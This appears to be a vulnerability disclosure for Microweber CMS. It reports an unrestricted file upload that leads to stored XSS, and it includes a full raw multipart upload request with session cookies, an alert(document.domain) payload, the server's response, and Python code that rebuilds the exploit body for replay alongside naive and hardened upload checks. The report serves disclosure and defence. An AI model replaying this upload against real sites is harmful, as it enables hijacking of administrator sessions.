Unrestricted file upload leads to stored XSS in microweber/microweber
Valid
Reported on Mar 9th 2022
Description
An authenticated user who is allowed to add pictures to a page can bypass the upload file-type check and store an .aspx file whose body is HTML. The file is then served back from the site's userfiles directory, on the site's own origin, so the script inside it executes in the browser of anyone who opens it (stored XSS).
Proof of Concept
- Log in as admin: https://demo.microweber.org/demo/admin/
- Go to Websites > Edit a page.
- Under Pictures, choose Add files
- Instead of uploading a normal picture, send the request below, which uploads an .aspx file.
-- The request to upload:
POST /demo/plupload HTTP/1.1
Host: demo.microweber.org
Cookie: csrf-token-data=%7B%22value%22%3A%22LbUJYT94IdMzaqSj3tCwbEgp402H94lb3LBdoQK8%22%2C%22expiry%22%3A1646836721840%7D; laravel_session=ZNv8dU4zHigWLlPFd8LQoeMyJtWGy8GK5Su1IA2F; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=2%7CTtYWLvivLcGGOKkv5QqtzWhOA7vw6wZPZIbryyJKGsVNHLLfQ4n75QWDNFH8%7C%242y%2410%24114oPbqv.UAg3ca706prIuSTMe3pAc9qYqT2gOBR1uldB9UTk%2FlYu; back_to_admin=https%3A//demo.microweber.org/demo/admin/
Content-Length: 533
Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="98"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7ACkSBriVfqdfw4D
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Origin: https://demo.microweber.org
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.microweber.org/demo/admin/page/24/edit
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

------WebKitFormBoundary7ACkSBriVfqdfw4D
Content-Disposition: form-data; name="name"

xss.aspx
------WebKitFormBoundary7ACkSBriVfqdfw4D
Content-Disposition: form-data; name="chunk"

0
------WebKitFormBoundary7ACkSBriVfqdfw4D
Content-Disposition: form-data; name="chunks"

1
------WebKitFormBoundary7ACkSBriVfqdfw4D
Content-Disposition: form-data; name="file"; filename="blob"
Content-Type: text/html

<html>
<script>alert(document.domain)</script>
</html>
IEND®B`
------WebKitFormBoundary7ACkSBriVfqdfw4D--
The response:
HTTP/1.1 200 OK
Date: Wed, 09 Mar 2022 14:26:01 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 09 Mar 2022 14:26:01 GMT
Connection: close
Content-Type: application/json
Content-Length: 123

{"src":"https:\/\/demo.microweber.org\/demo\/userfiles\/media\/default\/xss.aspx","name":"xss.aspx","bytes_uploaded":"533"}
- Visit https://demo.microweber.org/demo/userfiles/media/default/xss.aspx to confirm the XSS. Note that the stored filename comes from the separate "name" form field (xss.aspx), not from the filename="blob" of the file part, and the file is served from the site's own origin, so the alert shows demo.microweber.org.
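The upload above, replayed offline as an added example (this is not microweber's code, and the two check functions are illustrative models rather than the project's real upload validation): build_plupload_body() reconstructs the four-part body exactly as captured, parse_multipart() reads it back the way a server would, naive_check() shows a denylist-style check that lets xss.aspx through, and hardened_check() shows the allowlist-plus-content check that rejects it. The image allowlist, the magic bytes and the denylist are my assumptions about what a picture uploader should accept; the sample PNG bodies in the usage are constructed.

```python
import re

BOUNDARY = "----WebKitFormBoundary7ACkSBriVfqdfw4D"   # boundary from the captured request
CRLF = b"\r\n"
# Constructed file body: the PoC's HTML plus the leftover PNG IEND trailer bytes seen in the capture.
POC_FILE = b"<html>\r\n<script>alert(document.domain)</script>\r\n</html>\r\nIEND\xaeB`\x82"


def build_plupload_body(name, filename, content_type, data, boundary=BOUNDARY):
    """Rebuild a plupload-style multipart/form-data body with the same four parts as the PoC."""
    delim = b"--" + boundary.encode()

    def part(headers, body):
        return delim + CRLF + headers + CRLF + CRLF + body + CRLF

    return b"".join([
        part(b'Content-Disposition: form-data; name="name"', name.encode()),
        part(b'Content-Disposition: form-data; name="chunk"', b"0"),
        part(b'Content-Disposition: form-data; name="chunks"', b"1"),
        part(b'Content-Disposition: form-data; name="file"; filename="' + filename.encode()
             + b'"' + CRLF + b"Content-Type: " + content_type.encode(), data),
        delim + b"--" + CRLF,
    ])


def parse_multipart(body, boundary=BOUNDARY):
    """Minimal multipart/form-data parser: one dict per part (name, filename, content_type, data)."""
    delim = b"--" + boundary.encode()
    parts = []
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):                    # closing delimiter
            break
        head, _, data = chunk.lstrip(b"\r\n").partition(CRLF + CRLF)
        if data.endswith(CRLF):                        # CRLF that belongs to the next delimiter
            data = data[:-2]
        headers = {}
        for line in head.decode("latin-1").split("\r\n"):
            key, _, value = line.partition(":")
            headers[key.strip().lower()] = value.strip()
        params = dict(re.findall(r'(\w+)="([^"]*)"', headers.get("content-disposition", "")))
        parts.append({"name": params.get("name"), "filename": params.get("filename"),
                      "content_type": headers.get("content-type"), "data": data})
    return parts


def stored_name(parts):
    """plupload's separate 'name' field is what the server stored (the response says xss.aspx),
    not the Content-Disposition filename ('blob'); fall back to the latter if 'name' is absent."""
    fields = {p["name"]: p for p in parts}
    if "name" in fields:
        return fields["name"]["data"].decode("utf-8", "replace")
    return fields["file"]["filename"] or ""


EXEC_DENYLIST = {"php", "phtml", "php5", "phar"}      # assumed denylist, not microweber's list


def naive_check(parts):
    """Denylist check (assumed, for contrast): only well-known server-side script extensions are
    refused, so xss.aspx, .html, .svg and similar browser-rendered types pass."""
    return stored_name(parts).rsplit(".", 1)[-1].lower() not in EXEC_DENYLIST


# Allowlist for a picture uploader (assumed): extension -> (expected MIME, magic bytes).
ALLOWED = {
    "png": ("image/png", b"\x89PNG\r\n\x1a\n"),
    "jpg": ("image/jpeg", b"\xff\xd8\xff"), "jpeg": ("image/jpeg", b"\xff\xd8\xff"),
    "gif": ("image/gif", b"GIF8"), "webp": ("image/webp", b"RIFF"),
}
HTML_SNIFF = re.compile(rb"<\s*(?:!doctype|html|head|body|script|iframe|svg|object|embed)\b", re.I)


def hardened_check(parts):
    """Allowlist check: basename only, extension in ALLOWED, declared MIME matches, magic bytes
    match, and the first KiB must not sniff as HTML. Returns (ok, reason_or_stored_name)."""
    f = {p["name"]: p for p in parts}["file"]
    name = stored_name(parts).replace("\\", "/").rsplit("/", 1)[-1]   # strip any path component
    if "." not in name:
        return False, "no extension"
    ext = name.rsplit(".", 1)[-1].lower()
    if ext not in ALLOWED:
        return False, f"extension {ext!r} not in allowlist"
    mime, magic = ALLOWED[ext]
    if (f["content_type"] or "").split(";")[0].strip().lower() != mime:
        return False, f"declared type {f['content_type']!r} does not match {ext}"
    if not f["data"].startswith(magic):
        return False, "magic bytes do not match extension"
    if HTML_SNIFF.search(f["data"][:1024]):             # polyglot / content-sniffing defence
        return False, "body sniffs as HTML"
    return True, name


POC_BODY = build_plupload_body("xss.aspx", "blob", "text/html", POC_FILE)

if __name__ == "__main__":
    parts = parse_multipart(POC_BODY)
    print("stored as:", stored_name(parts), "| naive:", naive_check(parts), "| hardened:", hardened_check(parts))
```

POC_BODY is byte-for-byte the multipart body from the report, so it can also be replayed against a test instance with urllib by sending it with the captured Content-Type header and a valid session cookie. The hardened check deliberately validates the name the server will actually store rather than the browser's filename, which is the field the PoC exploits.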
Impact
An attacker who controls script that runs in a victim's browser can typically fully compromise that user's session. Here the payload is served from the site's own origin, so it can make authenticated requests to the admin panel on behalf of whoever opens the link; in this case the victim is an admin. The upload itself requires an authenticated account that is allowed to add pictures to a page (the PoC uses the demo admin account).
Peter Ivanov modified the report (a year ago).